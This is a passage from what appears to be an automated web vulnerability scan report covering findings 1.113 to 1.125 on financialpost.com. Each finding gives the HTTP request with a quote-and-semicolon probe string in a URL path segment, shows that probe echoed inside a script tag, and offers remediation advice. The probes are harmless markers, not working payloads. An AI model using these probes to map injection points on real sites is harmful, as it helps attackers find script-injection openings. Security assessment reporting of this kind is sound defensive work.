Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43251


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes/header/172af';120f40364cb/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes;kw=header;kw=172af';120f40364cb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=54429246?">
...[SNIP]...

1.113. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/sidebar/most-popular/iframed.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290f4'%3b344b87b1ee4 was submitted in the REST URL parameter 1. This input was echoed as 290f4';344b87b1ee4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes290f4'%3b344b87b1ee4/sidebar/most-popular/iframed.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:14 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43593


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes290f4';344b87b1ee4/sidebar/most-popular/iframed;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes290f4';344b87b1ee4;kw=sidebar;kw=most-popular;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+
...[SNIP]...

1.114. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/sidebar/most-popular/iframed.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 678d7'%3bfe2c818c345 was submitted in the REST URL parameter 2. This input was echoed as 678d7';fe2c818c345 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/sidebar678d7'%3bfe2c818c345/most-popular/iframed.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:19 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 39528


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes/sidebar678d7';fe2c818c345/most-popular/iframed;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes;kw=sidebar678d7';fe2c818c345;kw=most-popular;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=646
...[SNIP]...

1.115. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/sidebar/most-popular/iframed.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61041'%3bebbe0febebf was submitted in the REST URL parameter 3. This input was echoed as 61041';ebbe0febebf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/sidebar/most-popular61041'%3bebbe0febebf/iframed.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:24 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43520


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes/sidebar/most-popular61041';ebbe0febebf/iframed;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes;kw=sidebar;kw=most-popular61041';ebbe0febebf;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=37152752?">
...[SNIP]...

1.116. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /includes/sidebar/most-popular/iframed.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba0cd'%3bffc5ac2518 was submitted in the REST URL parameter 4. This input was echoed as ba0cd';ffc5ac2518 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/sidebar/most-popular/ba0cd'%3bffc5ac2518 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:30 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43557


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/includes/sidebar/most-popular/ba0cd';ffc5ac2518/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=includes;kw=sidebar;kw=most-popular;kw=ba0cd';ffc5ac2518;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34260287?">
...[SNIP]...

1.117. http://www.financialpost.com/js/account_s_code.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /js/account_s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc773'%3b3d124b5b04 was submitted in the REST URL parameter 1. This input was echoed as bc773';3d124b5b04 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsbc773'%3b3d124b5b04/account_s_code.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:17 GMT
Date: Sun, 19 Dec 2010 03:03:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42992


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/jsbc773';3d124b5b04/account_s_code;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=jsbc773';3d124b5b04;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=96540571?">
...[SNIP]...

1.118. http://www.financialpost.com/js/account_s_code.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /js/account_s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f01f'%3b33001376b97 was submitted in the REST URL parameter 2. This input was echoed as 6f01f';33001376b97 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/6f01f'%3b33001376b97 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42957


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/js/6f01f';33001376b97/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=js;kw=6f01f';33001376b97;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95619046?">
...[SNIP]...

1.119. http://www.financialpost.com/js/local_s_code.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /js/local_s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afcb6'%3b20b8654109d was submitted in the REST URL parameter 1. This input was echoed as afcb6';20b8654109d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsafcb6'%3b20b8654109d/local_s_code.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:20 GMT
Date: Sun, 19 Dec 2010 03:03:20 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42994


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/jsafcb6';20b8654109d/local_s_code;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=jsafcb6';20b8654109d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=27940247?">
...[SNIP]...

1.120. http://www.financialpost.com/js/local_s_code.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /js/local_s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3904a'%3b66e2a69e5b6 was submitted in the REST URL parameter 2. This input was echoed as 3904a';66e2a69e5b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/3904a'%3b66e2a69e5b6 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:26 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42957


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/js/3904a';66e2a69e5b6/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=js;kw=3904a';66e2a69e5b6;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=53325349?">
...[SNIP]...

1.121. http://www.financialpost.com/magazine/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /magazine/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee474'%3b656ca213590 was submitted in the REST URL parameter 1. This input was echoed as ee474';656ca213590 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /magazineee474'%3b656ca213590/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43140


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/magazineee474';656ca213590/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=magazineee474';656ca213590;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=65991524?">
...[SNIP]...

1.122. http://www.financialpost.com/markets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 799c0'%3b846cbcb660c was submitted in the REST URL parameter 1. This input was echoed as 799c0';846cbcb660c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets799c0'%3b846cbcb660c/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36302


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets799c0';846cbcb660c/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets799c0';846cbcb660c;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=49620621?">
...[SNIP]...

1.123. http://www.financialpost.com/markets/company/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89cb2'%3ba2a4a97ee03 was submitted in the REST URL parameter 1. This input was echoed as 89cb2';a2a4a97ee03 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets89cb2'%3ba2a4a97ee03/company/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43332


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets89cb2';a2a4a97ee03/company/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets89cb2';a2a4a97ee03;kw=company;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=13531203?">
...[SNIP]...

1.124. http://www.financialpost.com/markets/company/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd9f6'%3b784d6ba2a9b was submitted in the REST URL parameter 2. This input was echoed as dd9f6';784d6ba2a9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/companydd9f6'%3b784d6ba2a9b/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43296


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/companydd9f6';784d6ba2a9b/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=companydd9f6';784d6ba2a9b;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=92645471?">
...[SNIP]...

1.125. http://www.financialpost.com/markets/company/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
